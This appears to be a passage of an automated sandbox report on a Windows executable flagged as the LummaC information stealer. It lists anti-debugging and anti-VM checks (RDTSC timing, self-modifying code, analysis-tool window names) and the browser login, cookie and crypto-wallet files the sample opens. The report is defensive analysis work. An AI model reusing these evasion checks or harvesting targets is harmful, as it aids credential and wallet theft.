Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590016 second address: 5590043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF1610D0710h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590043 second address: 5590049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590049 second address: 559006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF1610D0718h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559006C second address: 55900B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF1610B8686h 0x00000010 xchg eax, ecx 0x00000011 jmp 00007FF1610B8680h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF1610B867Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55900B6 second address: 55900CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559016B second address: 559017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610B867Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559017B second address: 559017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559017F second address: 55901A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF1610B8689h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901A5 second address: 55901A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901A9 second address: 55901AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901AF second address: 55901B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55901B5 second address: 55901B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590C81 second address: 5590C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590CB7 second address: 5590CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8689h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 7A3Eh 0x00000012 mov eax, ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590CE0 second address: 5590CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590CE6 second address: 5590CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590CEA second address: 5590D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF1D15C4399h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF1610D0715h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5590D0F second address: 5590D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FF1610B8686h 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A08D6 second address: 55A092B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF1610D0716h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF1610D070Dh 0x0000001a or ecx, 39CAAC76h 0x00000020 jmp 00007FF1610D0711h 0x00000025 popfd 0x00000026 mov bx, cx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A092B second address: 55A099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ECFEh 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push ecx 0x0000000f movsx edx, si 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007FF1610B8685h 0x00000019 jmp 00007FF1610B867Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], esi 0x00000023 jmp 00007FF1610B8686h 0x00000028 mov esi, dword ptr [ebp+0Ch] 0x0000002b jmp 00007FF1610B8680h 0x00000030 test esi, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF1610B867Ah 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A099D second address: 55A09A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A09A1 second address: 55A09A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A09A7 second address: 55A0A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF1D15BE104h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FF1610D070Eh 0x00000016 add ecx, 0F7ABB18h 0x0000001c jmp 00007FF1610D070Bh 0x00000021 popfd 0x00000022 call 00007FF1610D0718h 0x00000027 movzx eax, bx 0x0000002a pop edx 0x0000002b popad 0x0000002c cmp dword ptr [75AF459Ch], 05h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov dx, EB9Ah 0x0000003a jmp 00007FF1610D070Bh 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0A18 second address: 55A0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1610B867Fh 0x00000009 sbb cl, FFFFFFEEh 0x0000000c jmp 00007FF1610B8689h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF1610B8680h 0x00000018 add ecx, 140BF168h 0x0000001e jmp 00007FF1610B867Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 je 00007FF1D15BE09Fh 0x0000002d jmp 00007FF1610B8686h 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ebx 0x00000037 pop esi 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0A93 second address: 55A0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0714h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 mov ax, 2F1Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0AB7 second address: 55A0B0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8685h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF1610B8683h 0x00000013 and esi, 569414CEh 0x00000019 jmp 00007FF1610B8689h 0x0000001e popfd 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0B0C second address: 55A0B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0719h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0B6E second address: 55A0B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0B74 second address: 55A0B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0B78 second address: 55A0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0BD0 second address: 55A0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0BD6 second address: 55A0BE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push edx 0x0000000b mov edi, esi 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A0BE8 second address: 55A0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10E6C80 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10C56E9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11418B0 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F18CF8 rdtsc

0_2_00F18CF8

Source: C:\Users\user\Desktop\file.exe TID: 3332	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3304	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2364	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2112105362.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2280254483.000000000167E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279008440.000000000167E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000002.2280194256.000000000161E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2112105362.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2280254483.000000000167E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279008440.000000000167E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2112299309.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F18CF8 rdtsc

0_2_00F18CF8

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EFB480 LdrInitializeThunk,

0_2_00EFB480

Source: file.exe, file.exe, 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 0ms`Program Manager
Source: file.exe, 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o0ms`Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2199711013.00000000016FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199762679.0000000001704000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.2279294350.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279208809.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280434751.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272354307.00000000016D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4208, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2280254483.000000000167E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s/ElectronCash
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty209715
Source: file.exe, 00000000.00000002.2280254483.000000000167E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Chrome/Default/Extensions/ExodusWeb3yance
Source: file.exe, 00000000.00000003.2089565968.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: g\Ethereum
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
